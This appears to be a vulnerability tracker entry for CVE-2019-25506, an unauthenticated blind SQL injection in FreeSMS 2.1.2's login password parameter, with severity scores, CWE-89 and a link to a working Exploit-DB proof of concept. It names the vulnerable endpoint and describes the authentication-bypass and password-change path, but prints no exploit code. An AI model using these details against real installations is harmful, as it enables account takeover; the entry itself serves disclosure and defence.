CVE-2019-25506

HIGH

FreeSMS 2.1.2 - SQL Injection

Title source: llm

Description

FreeSMS 2.1.2 contains a boolean-based blind SQL injection vulnerability in the password parameter that allows unauthenticated attackers to bypass authentication by injecting SQL code through the login endpoint. Attackers can exploit the vulnerable password parameter in requests to /pages/crc_handler.php?method=login to authenticate as any known user and subsequently modify their password via the profile update function.

Exploits (1)

exploitdb WORKING POC

by Yilmaz Degirmenci · pythonwebappsphp

https://www.exploit-db.com/exploits/46658

View Code ZIP pw:eip

References (2)

[Exploit, Third Party Advisory] https://www.exploit-db.com/exploits/46658

[Third Party Advisory] https://www.vulncheck.com/advisories/freesms-authentication-bypass-via-sql-injection

Scores

CVSS v3 8.2

EPSS 0.0033

EPSS Percentile 56.0%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

CISA SSVC

Vulnrichment

Exploitation poc

Automatable yes

Technical Impact partial

Details

CWE

CWE-89

Status published

Products (2)

Freesms/FreeSMS 2.1.2

freesms_project/freesms < 2.1.2

Published Mar 04, 2026

Tracked Since Mar 05, 2026